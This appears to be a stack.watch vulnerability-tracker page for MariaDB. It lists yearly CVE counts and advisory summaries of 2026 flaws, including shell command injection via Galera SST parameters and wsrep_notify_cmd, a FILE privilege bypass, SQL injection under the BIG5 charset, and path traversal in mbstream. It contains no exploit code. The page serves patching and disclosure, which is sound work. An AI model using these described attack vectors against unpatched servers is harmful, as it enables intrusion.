MariaDB MariaDB Open source fork of MySQL database

Don't miss out!

Thousands of developers use stack.watch to stay informed.
Get an email whenever new security vulnerabilities are reported in any MariaDB product.

RSS Feeds for MariaDB security vulnerabilities

Create a CVE RSS feed including security vulnerabilities found in MariaDB products with stack.watch. Just hit watch, then grab your custom RSS feed url.

Products by MariaDB Sorted by Most Security Vulnerabilities since 2018

MariaDB367 vulnerabilities
Open source RDBMS forked from MySQL

MariaDB Connectorc1 vulnerability

MariaDB Maxscale1 vulnerability

By the Year

In 2026 there have been 11 vulnerabilities in MariaDB with an average score of 8.0 out of ten. Last year, in 2025 MariaDB had 2 security vulnerabilities published. That is, 9 more vulnerabilities have already been reported in 2026 as compared to last year.




Year Vulnerabilities Average Score
2026 11 8.00
2025 2 0.00
2024 3 0.00
2023 4 6.35
2022 60 6.83
2021 15 5.43
2020 16 5.69
2019 16 5.73
2018 40 5.58

It may take a day or so for new MariaDB vulnerabilities to show up in the stats or in the list of recent security vulnerabilities. Additionally vulnerabilities may be tagged under a different product or component name.

Recent MariaDB Security Vulnerabilities

CVE Date Vulnerability Products
CVE-2026-48165 Jun 12, 2026
MariaDB CVE-2026-48165: wsrep_sst exec 10.6.x,10.11.x,11.4.x,11.8.x,12.3.1 MariaDB server is a community developed fork of MySQL server. From versions 10.6.1 to before 10.6.27, 10.11.1 to before 10.11.18, 11.4.1 to before 11.4.12, 11.8.1 to before 11.8.8, and 12.3.1, a high-privileged MariaDB user could've used wsrep_sst_receive_address or wsrep_sst_donor global system variables to execute shell commands as the uid of the mariadbd process on the galera joiner node. This issue has been patched in versions 10.6.27, 10.11.18, 11.4.12, 11.8.8, and 12.3.2.
CVE-2026-48163 Jun 12, 2026
Mariadb SST Shell Exec via rsync before 10.6.27,10.11.18,11.4.12,11.8.8,12.3.2 MariaDB server is a community developed fork of MySQL server. From versions 10.6.1 to before 10.6.27, 10.11.1 to before 10.11.18, 11.4.1 to before 11.4.12, 11.8.1 to before 11.8.8, and 12.3.1, during the SST the donor node is interpolating parameters that the joiner sent into the command line. Not all parameters were properly validated which could allow a malicious joiner to execute arbitrary shell commands on the donor side via the rsync SST method. This issue has been patched in versions 10.6.27, 10.11.18, 11.4.12, 11.8.8, and 12.3.2.
CVE-2026-44173 Jun 12, 2026
MariaDB 10.x-12.3.1 PrivEsc: SELECT...INTO OUTFILE w/o FILE privilege MariaDB server is a community developed fork of MySQL server. From versions 10.6.1 to before 10.6.26, 10.11.1 to before 10.11.17, 11.4.1 to before 11.4.11, 11.8.1 to before 11.8.7, and 12.3.1, MariaDB allowed SELECT ... INTO OUTFILE and SELECT ... INTO DUMPFILE without verifying the FILE privilege if the FROM clause contained only subqueries. This issue has been patched in versions 10.6.26, 10.11.17, 11.4.11, 11.8.7, and 12.3.2.
CVE-2026-44172 Jun 12, 2026
MariaDB Server SQLi via text protocol & BIG5 (v3.3.18/3.4.8) before 3.3.19 MariaDB server is a community developed fork of MySQL server. In versions 3.3.18 and 3.4.8, an application that was taking non-validated user input, escaping it with mysql_real_escape_string() and sending it to the database using text protocol and big5 character set was vulnerable to SQL injections, even though mysql_real_escape_string() was supposed to prevent them. This issue has been patched in versions 3.3.19 and 3.4.9.
CVE-2026-44171 Jun 12, 2026
MariaDB mbstream Path Traversal v10.6.110.6.26 / 10.11.110.11.17 patch MariaDB server is a community developed fork of MySQL server. From versions 10.6.1 to before 10.6.26, 10.11.1 to before 10.11.17, 11.4.1 to before 11.4.11, 11.8.1 to before 11.8.7, and 12.3.1, mbstream did not check for /../ in the path when unpacking the archive. A proper backup can never contain such paths, but a specially crafted archive could have caused mbstream to create files outside of the target-dir path. This issue has been patched in versions 10.6.26, 10.11.17, 11.4.11, 11.8.7, and 12.3.2.
CVE-2026-44169 Jun 12, 2026
MariaDB 11.4.x, 11.8.x, 12.3.x Stored Routine Definition Leak via Role EXECUTE MariaDB server is a community developed fork of MySQL server. From versions 11.4.1 to before 11.4.11, 11.8.1 to before 11.8.7, and 12.3.1, a user getting EXECUTE access to a stored routine via a role, could see the routine definition even without SHOW CREATE ROUTINE privilege. This issue has been patched in versions 11.4.11, 11.8.7, and 12.3.2.
CVE-2026-44168 Jun 12, 2026
MariaDB SST Shell Injection (10.6.x10.6.25, 10.11.x10.11.16, 11.4.x11.4.10, 11.8.x11.8.6, 12.3.1) MariaDB server is a community developed fork of MySQL server. From versions 10.6.1 to before 10.6.26, 10.11.1 to before 10.11.17, 11.4.1 to before 11.4.11, 11.8.1 to before 11.8.7, and 12.3.1, during the SST the donor node is interpolating parameters that the joiner sent into the command line. Not all parameters were properly validated which could allow a malicious joiner to execute arbitrary shell commands on the donor side via the mariabackup SST method. This issue has been patched in versions 10.6.26, 10.11.17, 11.4.11, 11.8.7, and 12.3.2.
CVE-2026-44170 Jun 12, 2026
MariaDB <=10.6.26/10.11.17/11.4.11/11.8.7/12.3.2 REST Shell Cmd Injection MariaDB server is a community developed fork of MySQL server. From versions 10.6.1 to before 10.6.26, 10.11.1 to before 10.11.17, 11.4.1 to before 11.4.11, 11.8.1 to before 11.8.7, and 12.3.1, MariaDB on WIndows with installed CONNECT engine and enabled REST support interpolated table HTTP attribute into the curl command line without proper sanitizing. This allows the user to execute shell commands on the server. This issue has been patched in versions 10.6.26, 10.11.17, 11.4.11, 11.8.7, and 12.3.2.
CVE-2026-49261 Jun 11, 2026
MariaDB Server <10.6.27, <10.11.18 Exec via wsrep_notify_cmd MariaDB server is a community developed fork of MySQL server. Versions 10.6.1 through 10.6.26, 10.11.1 through 10.11.17, 11.4.1 through 11.4.11, 11.8.1 through 11.8.7, and 12.3.1 with `wsrep_notify_cmd` enabled would execute shell commands embedded in the name of the joiner node. This is fixed in 10.6.27, 10.11.18, 11.4.12, 11.8.8, and 12.3.2. As a workaround, anyone who cannot upgrade now should disable `wsrep_notify_cmd`.
CVE-2026-35549 Apr 03, 2026
Large packet crash in MariaDB <11.4.10/11.8.6/12.2.2 cache_sha2 auth plugin An issue was discovered in MariaDB Server before 11.4.10, 11.5.x through 11.8.x before 11.8.6, and 12.x before 12.2.2. If the caching_sha2_password authentication plugin is installed, and some user accounts are configured to use it, a large packet can crash the server because sha256_crypt_r uses alloca.
MariaDB
Built by Foundeo Inc., with data from the National Vulnerability Database (NVD). Privacy Policy. Use of this site is governed by the Legal Terms
Disclaimer
CONTENT ON THIS WEBSITE IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS AT YOUR OWN RISK. Always check with your vendor for the most up to date, and accurate information.